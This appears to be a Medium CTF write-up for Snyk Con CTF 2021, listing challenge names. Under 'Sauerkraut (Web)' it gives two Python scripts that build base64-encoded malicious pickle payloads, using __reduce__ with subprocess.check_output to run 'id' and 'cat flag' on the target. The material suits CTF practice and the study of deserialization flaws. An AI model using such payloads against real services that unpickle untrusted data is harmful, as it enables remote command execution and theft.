Snyk Con CTF 2021

Magician (Web)

Electronbuzz (Misc)

Robert Louis Stevenson (Misc)

Sauerkraut (Web)

import base64
import codecs
import pickle
class RCE(object):
def __reduce__(self):
import subprocess
return (subprocess.check_output, (['id'], ) )
class RCEStr(object):
def __reduce__(self):
return (codecs.decode, (RCE(), 'utf-8') )
pickle_data = pickle.dumps({'name': RCEStr()})
payload = base64.urlsafe_b64encode(pickle_data)
print(payload.decode('utf-8'))
import base64
import codecs
import pickle
class RCE(object):
def __reduce__(self):
import subprocess
return (subprocess.check_output, (['cat','flag'], ) )
class RCEStr(object):
def __reduce__(self):
return (codecs.decode, (RCE(), 'utf-8') )
pickle_data = pickle.dumps({'name': RCEStr()})
payload = base64.urlsafe_b64encode(pickle_data)
print(payload.decode('utf-8'))

References

--

--

--

Pentester | CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

When Coding is Life

How to Create a stunning GitHub Profile Readme?

Learn How To Compile a C++ Program

Best Practices for Salesforce CPQ Implementation

How Netstat knows which process is holding a socket?

Pass by Value and Pass by Reference in Go

Forget-me-not

Migrate Azure DevOps work items queries to a new organization

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ARZ101

ARZ101

Pentester | CTF Player

More from Medium

HackTheBox — Monteverde

Remote HTB

TryHackMe | CTF | Walkthrough |Troll 😅😂😭

HTB Write-up Sunday Port 79 (finger) Enum, SSH pass cracking with panator